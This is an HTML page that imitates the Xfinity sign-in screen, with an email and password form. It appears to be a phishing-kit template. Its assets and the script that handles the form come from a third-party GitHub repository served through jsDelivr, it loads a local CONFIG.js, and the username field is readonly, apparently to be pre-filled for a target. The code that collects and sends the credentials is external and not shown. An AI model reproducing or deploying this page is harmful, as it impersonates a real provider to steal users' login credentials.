<html lang="en" class="light da da-expandable" data-resource-package-id="res-responsive-login-page">
<head>
  <title>Sign in to Xfinity</title>
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-capable" content="yes">

  <meta name="viewport" content="width=device-width,initial-scale=1">
  <meta name="msapplication-TileColor" content="#ffffff">
  <meta name="theme-color" content="#ffffff">

  <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/assets/Others/static/static/css/junket/fonts-remote.min.css">
  <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/assets/Others/static/static/css/junket/styles-light.min.css">
  <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/assets/Others/static/static/style.css">


  <style type="text/css">
    @media only screen and (min-width: 1400px) {
      .ad.ad-fullscreen #left {
        margin-left: 670px;
      }
      .ad.ad-fullscreen #right {
        margin-right: 0px;
      }
    }
    .da-300x250 #ad-block {
      height: 250px;
      overflow: hidden;
    }
  </style>
  <script src="../../../CONFIG.js"></script>
</head>
<body class=" has-footer">
<main id="bd">
  <h1 class="screen-reader-text">Sign in to Xfinity</h1>
  <div id="left">
    <div id="ad-block">
      <h2 id="ad-heading" class="screen-reader-text">Advertisement</h2>
      <div id="ads-info">
        <a class="first" href="http://www.comcast.net/adinformation" rel="default" target="_blank">Ad Info</a>
        <span class="divider"></span>
        <a href="https://www.surveymonkey.com/s.aspx?sm=FyNNVDhj_2f2FNc2KVOHQ4eg_3d_3d" target="_blank">Ad Feedback</a>
      </div>
      <img width="0" height="0" src="https://7468.v.fwmrm.net/ad/u?mode=echo&amp;cr=https%3A%2F%2Fdpm.demdex.net%2Fibs%3Adpid%3D796%26dpuuid=%23%7Buser.id%7D">
      <img src="https://xfinitydigital.demdex.net/event?d_sid=4702129" width="0" height="0"></div>
  </div><div id="right">		<div class="container">
  <form name="signin" id="form_signin" method="post" novalidate="">
    <input type="hidden" id="domain">
    <div class="single logo-wrapper">
      <span aria-role="img" class="xfinity-logo"></span>
    </div>
    <div class="textfield-wrapper">
      <label for="user" class="float">Email Address</label>
      <input id="user" name="user" type="text" placeholder="Email, mobile, or username" readonly value="" autocorrect="off" autocapitalize="off" spellcheck="false" maxlength="128" autocomplete="username" required="" data-empty-message="Please enter your Xfinity ID to sign in.">
    </div>

    <div class="textfield-wrapper">
      <label for="passwd" class="float accessibly-hidden">Password</label>
      <input id="passwd" name="passwd" type="password" placeholder="Password" maxlength="128" autocomplete="current-password" required="" data-empty-message="Please type in your password to sign in.">
    </div>
    <p id="passwd-error" class="error_message">Please type in your password to continue.</p>


    <div class="checkbox-container">
      <label for="remember_me">
        <input type="checkbox" id="remember_me" name="rm" value="1"><span id="remember_me_checkbox" class="checkbox"></span><div class="content">Stay signed in</div>
      </label>
      <button type="button" id="rm_label_learn_more" class="icon info cancel" data-id-ref="rm_help" aria-controls="rm_help" aria-label="Learn more about staying signed in"></button>
    </div>
    <button class="submit" type="submit" id="sign_in">Continue</button>

  </form>
</div>

</div>
</main>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js" integrity="sha256-xNzN2a4ltkB44Mc/Jz3pT4iU1cmeR0FkXs4pru/JxaQ=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/gh/jmtechofficial/jm-adbe-assets@master/addons/assets/Others/jsc.js"></script>
</body></html>